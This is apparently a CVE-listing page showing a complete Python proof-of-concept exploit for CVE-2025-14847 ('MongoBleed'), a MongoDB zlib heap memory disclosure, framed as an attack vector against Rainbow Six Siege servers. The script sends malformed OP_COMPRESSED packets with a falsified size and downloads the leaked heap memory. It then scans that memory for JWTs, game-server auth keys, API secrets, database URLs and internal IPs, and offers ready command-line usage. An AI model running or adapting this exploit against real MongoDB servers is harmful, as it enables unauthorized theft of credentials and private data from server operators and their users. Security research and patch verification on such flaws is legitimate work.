4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2025-14847 (MongoBleed) - R6 Attack Vector PoC
Author: Security Research Team
License: MIT (Educational Use Only)

This tool demonstrates heap memory disclosure in MongoDB's zlib compression layer.
Simulates the suspected attack vector used against Rainbow Six Siege infrastructure.
"""

import socket
import struct
import zlib
import random
import sys
import argparse
import time
import re
import json
import base64
from typing import Dict, List, Tuple, Optional
from dataclasses import dataclass, asdict
from datetime import datetime


@dataclass
class LeakResult:
    """Container for memory leak analysis results"""
    timestamp: str
    target: str
    bytes_leaked: int
    patterns_found: Dict[str, List[str]]
    success: bool
    error: Optional[str] = None


class R6Exploit:
    """
    CVE-2025-14847 Exploitation Framework
    Target: MongoDB with zlib compression enabled
    """
    
    # Pattern signatures for R6-specific artifacts
    PATTERNS = {
        "JWT_Token": rb"eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+",
        "R6_Server_Auth": rb"R6S_SERVER_AUTH_[A-Z0-9]{32,}",
        "R6_Analytics_Key": rb"R6S_ANALYTICS_KEY_[a-z0-9]{30,}",
        "R6_Telemetry_Key": rb"R6S_TELEMETRY_KEY_[a-z0-9]{30,}",
        "Ubisoft_API_Secret": rb"UPLAY_API_SECRET_[a-z0-9]{30,}",
        "UUID": rb"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}",
        "MongoDB_URL": rb"mongodb://[a-zA-Z0-9_\-:@./]+",
        "Internal_IP": rb"10\.\d{1,3}\.\d{1,3}\.\d{1,3}",
        "Pro_Team": rb"(W7M Esports|FaZe Clan|Team Liquid|G2 Esports|FURIA)",
        "Match_ID": rb"match_uuid_[a-f0-9\-]{36,}",
    }
    
    def __init__(self, target_ip: str, target_port: int = 27017, 
                 leak_size: int = 1048576, timeout: int = 10):
        self.target_ip = target_ip
        self.target_port = target_port
        self.leak_size = leak_size
        self.timeout = timeout
        self.sock = None
        
    def _connect(self) -> bool:
        """Establish connection with exponential backoff retry"""
        max_retries = 3
        for attempt in range(max_retries):
            try:
                self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock.settimeout(self.timeout)
                self.sock.connect((self.target_ip, self.target_port))
                return True
            except (socket.timeout, ConnectionRefusedError) as e:
                if attempt < max_retries - 1:
                    wait_time = 2 ** attempt
                    print(f"[!] Connection attempt {attempt + 1} failed, retrying in {wait_time}s...")
                    time.sleep(wait_time)
                else:
                    print(f"[-] Connection failed after {max_retries} attempts: {e}")
                    return False
            except Exception as e:
                print(f"[-] Unexpected connection error: {e}")
                return False
                
    def _close(self):
        """Safely close socket connection"""
        if self.sock:
            try:
                self.sock.close()
            except:
                pass
            self.sock = None
            
    def build_malformed_packet(self) -> Tuple[bytes, int]:
        """
        Construct malicious OP_COMPRESSED packet
        
        Vulnerability: MongoDB allocates buffer based on uncompressedSize
        without validating it matches actual decompressed data length.
        """
        # Base payload: isMaster query (pre-auth check)
        bson_payload = b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00'
        op_query_header = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<ii', 0, -1)
        original_msg = op_query_header + bson_payload
        
        # Compress the small payload
        compressed_body = zlib.compress(original_msg, level=9)
        actual_size = len(original_msg)
        
        print(f"[*] Actual decompressed size: {actual_size} bytes")
        print(f"[*] Fake uncompressed size: {self.leak_size} bytes")
        print(f"[*] Expected leak: ~{self.leak_size - actual_size} bytes of heap memory")
        
        # Malicious OP_COMPRESSED message
        op_compressed_data = (
            struct.pack('<I', 2004) +            # originalOpcode: OP_QUERY
            struct.pack('<I', self.leak_size) +  # MALICIOUS: Oversized claim
            b'\x02' +                            # compressorId: zlib
            compressed_body
        )
        
        # MongoDB wire protocol header
        request_id = random.randint(10000, 99999)
        op_code = 2012  # OP_COMPRESSED
        total_len = 16 + len(op_compressed_data)
        header = struct.pack('<iiii', total_len, request_id, 0, op_code)
        
        return header + op_compressed_data, request_id
        
    def check_vulnerability(self) -> bool:
        """
        Non-intrusive probe to detect MongoDB and version
        """
        print(f"\n{'='*60}")
        print(f"[*] PROBE MODE: {self.target_ip}:{self.target_port}")
        print(f"{'='*60}\n")
        
        if not self._connect():
            return False
            
        try:
            # Send standard uncompressed isMaster
            op_query = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<ii', 0, -1) + \
                       b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00'
            header = struct.pack('<iiii', 16 + len(op_query), random.randint(1, 999), 0, 2004)
            self.sock.sendall(header + op_query)
            
            # Parse response
            resp_header = self.sock.recv(16)
            if len(resp_header) < 16:
                print("[-] Invalid response format")
                return False
                
            resp_len = struct.unpack('<i', resp_header[:4])[0]
            resp_body = self.sock.recv(resp_len - 16)
            
            # Extract version from BSON response
            if b"version" in resp_body:
                # Simple extraction (not full BSON parsing)
                version_match = re.search(rb'version\x00.{1,50}?(\d+\.\d+\.\d+)', resp_body)
                if version_match:
                    version = version_match.group(1).decode('utf-8')
                    print(f"[+] MongoDB {version} detected")
                    
                    # Check if vulnerable
                    major, minor, patch = map(int, version.split('.'))
                    vulnerable = (
                        (major == 6 and minor == 0 and patch < 27) or
                        (major == 7 and minor == 0 and patch < 28) or
                        (major == 8 and minor == 0 and patch < 17) or
                        (major == 8 and minor == 2 and patch < 3) or
                        major < 6
                    )
                    
                    if vulnerable:
                        print(f"[!] VULNERABLE to CVE-2025-14847")
                    else:
                        print(f"[+] Patched version (not vulnerable)")
                        
                    return vulnerable
                    
            print("[+] MongoDB detected but version unknown")
            return True
            
        except Exception as e:
            print(f"[-] Probe error: {e}")
            return False
        finally:
            self._close()
            
    def exploit(self, output_file: Optional[str] = None) -> Optional[LeakResult]:
        """
        Execute memory leak attack
        """
        print(f"\n{'='*60}")
        print(f"[!] EXPLOIT MODE: {self.target_ip}:{self.target_port}")
        print(f"{'='*60}\n")
        
        if not self._connect():
            return None
            
        try:
            # Send malicious packet
            packet, req_id = self.build_malformed_packet()
            print(f"[*] Sending malicious OP_COMPRESSED (ID: {req_id})...")
            self.sock.sendall(packet)
            
            # Receive response header
            resp_header = self.sock.recv(16)
            if not resp_header or len(resp_header) < 16:
                print("[-] No response. Target may be patched or crashed.")
                return LeakResult(
                    timestamp=datetime.now().isoformat(),
                    target=f"{self.target_ip}:{self.target_port}",
                    bytes_leaked=0,
                    patterns_found={},
                    success=False,
                    error="No server response"
                )
                
            resp_len, resp_id, resp_to, resp_opcode = struct.unpack('<iiii', resp_header)
            print(f"[+] Server responded! Total message size: {resp_len} bytes")
            
            # Receive leaked data with progress tracking
            leaked_data = b''
            remaining = resp_len - 16
            
            print(f"[*] Downloading {remaining} bytes...", end='', flush=True)
            while remaining > 0:
                try:
                    chunk_size = min(8192, remaining)
                    chunk = self.sock.recv(chunk_size)
                    if not chunk:
                        break
                    leaked_data += chunk
                    remaining -= len(chunk)
                    
                    # Progress indicator
                    if len(leaked_data) % 32768 == 0:
                        print(".", end='', flush=True)
                except socket.timeout:
                    print("\n[!] Timeout during reception")
                    break
                    
            print(f"\n[+] Captured {len(leaked_data)} bytes")
            
            # Analyze leaked memory
            patterns_found = self._analyze_memory(leaked_data)
            
            # Save raw dump if requested
            if output_file:
                with open(output_file, "wb") as f:
                    f.write(leaked_data)
                print(f"[+] Raw dump saved: {output_file}")
                
            result = LeakResult(
                timestamp=datetime.now().isoformat(),
                target=f"{self.target_ip}:{self.target_port}",
                bytes_leaked=len(leaked_data),
                patterns_found=patterns_found,
                success=True
            )
            
            return result
            
        except ConnectionResetError:
            print("[-] Connection reset! Leak size may be too large.")
            print("    Try reducing --leak-size (e.g., 65536)")
            return None
        except Exception as e:
            print(f"[-] Exploit error: {e}")
            return None
        finally:
            self._close()
            
    def _analyze_memory(self, data: bytes) -> Dict[str, List[str]]:
        """
        Heuristic pattern matching for R6 artifacts
        """
        print(f"\n{'-'*60}")
        print("[*] ANALYZING LEAKED MEMORY")
        print(f"{'-'*60}\n")
        
        # Strip null bytes for cleaner regex matching
        clean_data = data.replace(b'\x00', b' ')
        
        results = {}
        total_findings = 0
        
        for pattern_name, pattern_regex in self.PATTERNS.items():
            matches = re.findall(pattern_regex, clean_data)
            if matches:
                unique_matches = list(set(matches))
                results[pattern_name] = [
                    m.decode('utf-8', errors='ignore') for m in unique_matches
                ]
                
                print(f"[+] {pattern_name}: {len(unique_matches)} unique")
                for match in unique_matches[:3]:  # Show max 3 samples
                    display = match.decode('utf-8', errors='ignore') if isinstance(match, bytes) else match
                    if len(display) > 80:
                        display = display[:77] + "..."
                    print(f"    └─ {display}")
                    
                if len(unique_matches) > 3:
                    print(f"    └─ ... and {len(unique_matches) - 3} more")
                    
                total_findings += len(unique_matches)
                print()
                
        if total_findings == 0:
            print("[-] No high-value patterns detected")
            print("[*] Dumping ASCII preview (last 512 bytes):")
            preview = "".join(chr(b) if 32 <= b <= 126 else "." for b in data[-512:])
            print(f"    {preview[:80]}")
            if len(preview) > 80:
                print(f"    {preview[80:160]}")
                
        print(f"{'-'*60}\n")
        print(f"[*] Total artifacts found: {total_findings}")
        
        return results
        
    def generate_report(self, result: LeakResult, output_file: str):
        """Generate JSON report of findings"""
        report = asdict(result)
        report['exploit_config'] = {
            'leak_size': self.leak_size,
            'timeout': self.timeout,
            'cve': 'CVE-2025-14847'
        }
        
        with open(output_file, 'w') as f:
            json.dump(report, f, indent=2)
            
        print(f"[+] JSON report saved: {output_file}")


def main():
    banner = """
    ╔══════════════════════════════════════════════════════════╗
    ║  CVE-2025-14847: MongoBleed R6 Attack Vector PoC        ║
    ║  Target: MongoDB Zlib Compression Memory Disclosure     ║
    ║  WARNING: Authorized Testing Only                       ║
    ╚══════════════════════════════════════════════════════════╝
    """
    print(banner)
    
    parser = argparse.ArgumentParser(
        description="MongoDB CVE-2025-14847 Exploitation Tool",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Check if target is vulnerable
  %(prog)s --target 127.0.0.1 --check
  
  # Leak 64KB of memory
  %(prog)s --target 127.0.0.1 --leak-size 65536 --out r6_leak.bin
  
  # Full attack with JSON report
  %(prog)s --target 10.0.0.5 --leak-size 1048576 --out dump.bin --report findings.json
        """
    )
    
    parser.add_argument("--target", required=True, help="Target MongoDB IP")
    parser.add_argument("--port", type=int, default=27017, help="Target port (default: 27017)")
    parser.add_argument("--leak-size", type=int, default=1048576, 
                        help="Fake uncompressed size in bytes (default: 1MB)")
    parser.add_argument("--timeout", type=int, default=10, help="Socket timeout (default: 10s)")
    parser.add_argument("--check", action="store_true", help="Probe mode: detect vulnerability")
    parser.add_argument("--out", help="Save raw memory dump to file")
    parser.add_argument("--report", help="Generate JSON report of findings")
    
    args = parser.parse_args()
    
    # Input validation
    if args.leak_size < 1024 or args.leak_size > 10485760:  # 1KB to 10MB
        print("[-] Error: leak-size must be between 1024 and 10485760 bytes")
        sys.exit(1)
        
    exploit = R6Exploit(
        target_ip=args.target,
        target_port=args.port,
        leak_size=args.leak_size,
        timeout=args.timeout
    )
    
    if args.check:
        # Probe mode
        is_vulnerable = exploit.check_vulnerability()
        sys.exit(0 if is_vulnerable else 1)
    else:
        # Exploit mode
        result = exploit.exploit(output_file=args.out)
        
        if result and result.success:
            if args.report:
                exploit.generate_report(result, args.report)
                
            # Exit with success if patterns found
            sys.exit(0 if result.patterns_found else 2)
        else:
            sys.exit(1)


if __name__ == "__main__":
    main()